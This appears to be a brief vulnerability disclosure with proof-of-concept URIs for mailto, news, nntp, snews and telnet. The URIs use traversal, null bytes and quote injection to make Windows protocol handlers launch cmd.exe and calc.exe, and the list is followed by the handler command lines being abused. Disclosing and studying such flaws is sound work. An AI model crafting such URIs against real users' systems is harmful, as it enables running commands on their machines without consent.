Multiple Browser URI Handlers Command Injection Vulnerabilities
The following proofs of concept demonstrate this vulnerability.

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat
news:windows/system32/calc.exe%20"%20-%20"%20blah.bat
snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat
telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l
news:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1
nntp:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1
snews:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1
mailto:// C:\lotus\notes\notes.exe /defini %1